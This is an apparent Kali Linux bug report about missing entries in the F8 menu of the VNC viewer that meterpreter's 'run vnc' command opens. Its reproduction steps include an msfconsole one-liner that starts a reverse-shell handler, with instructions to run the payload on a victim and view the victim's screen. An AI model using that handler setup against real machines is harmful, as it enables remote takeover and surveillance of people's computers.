Summary0009710: metasploit-framework - does kali use a special version?
Description

Dear maintainers,

I discovered a little issue, but can not find out, what happens.
Description:
When connected to a meterpreter connection, I can use thje coimmand "run vnc" to start a vnc connection and a vncviewer (I guess it is tightvncviewer???).

In this there is a hotkey, here it is F8, which opens a menu. I suppose, you know this.

But: There is a difference when running from kali-live, kali native installed and metasploit started in a debian system.

The problem is, that i this menu, several settings are missing using debian or kali-live. On a native installed kali this is working.

So question: Is there anything special with the installed version versus the version in a kali live system or debian?

Do I miss something, maybe a rights problem? I started both as normal user and as root, but same results.

Maybe you could point me somewhere, but at the moment I am lost.

And yes, I know, "run vnc" is going to be deprecated, but is still working (and please do not drop it!).

Thank you for any hints that I will be able to look for the cause of this issue.

Best regards

Hans

I did so, as suggested. However, it may be a technical problem, for example, it might be, that on a native installed kali-linux is something installed, which is NOT installed in a livebuild image.
If I am correct with this thoughts, then the question is, what is the difference in the packet choice, when installing a native system or building a liveimage? IMO there should be no difference as the dependencies of packages should be the same on both.

Rechecked today again, and in the menu several options are completely missing (like "options" or the whole presetting submenu). And as I said before: The defective menu has a grey background with black fonts, and the working menu has a white background and a smaller font.

Thus let m think, there might be some library missing. As I do not know, which libraries are needed, I will have to compare the installed libs between livesystem and installed kali. As vnc is ruby based, I have the suspicion, some ruby package is missing. If one knows more, fell free to give me the information. If not, please wait some days, I will inform you, as soon as I know more.

Press thumbs!

Ok, looks like a bug!
I downloaded the latest version of kali live and got into the same issue as in my self build versions. This proves, that it is not my fault, but within kali itself.
Also here several options in the hotmenu are missing. Check for yourself doing this:

  1. msfconsole +x "use multi/handler; set PAYLOAD windows/mterpreter/revrse_tcp; set LHOST Set_your_IP_here; set LPORT 4444; run"
  2. Start your payload on the victim
  3. start "run vnc" on Kali-machine and wait until you see the victim screen.

Now press F8, to see the menu.Several entries are missing!

These missings are existent on my native installed kali system and I might to remember, they were also existent in prior kali live builds.
Note: My native installed kali was primary installed almost half a year ago and was regularly updated and upgraded.

The question is for now: Is it a bug in kali or did the developers change things? Both I can not prove, in this question I am completely lost.

So I suggest: If this is a feature and not a bug, please close this bugreport, then also sorry for the noise. But when it is defintely a bug (what I personally think!), then please be so kind and fix it.

Thank you very nuch for your patience with me.

Best

Hans
